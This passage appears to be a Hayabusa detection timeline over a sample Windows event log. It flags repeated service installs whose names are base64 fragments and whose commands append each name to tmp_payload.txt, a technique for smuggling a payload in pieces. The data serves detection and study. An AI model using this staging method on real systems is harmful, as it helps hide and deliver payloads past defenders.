deployed via service - Tchopper.evtx" 2021-11-03 17:15:32.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:32.440 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:32.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:33.911 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:33.911 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:33.911 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:35.365 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:35.365 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:35.365 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:36.820 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:36.820 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:36.820 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:38.273 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:38.273 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:38.273 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:39.711 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:39.711 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" 2021-11-03 17:15:39.711 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:41.177 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:41.177 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:41.177 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:42.631 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:42.631 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:42.631 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:44.099 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:44.099 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:44.099 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:45.554 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:45.554 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:45.554 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:47.028 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:47.028 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 
PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:47.028 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:48.498 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:48.498 
+09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:48.498 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:49.956 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 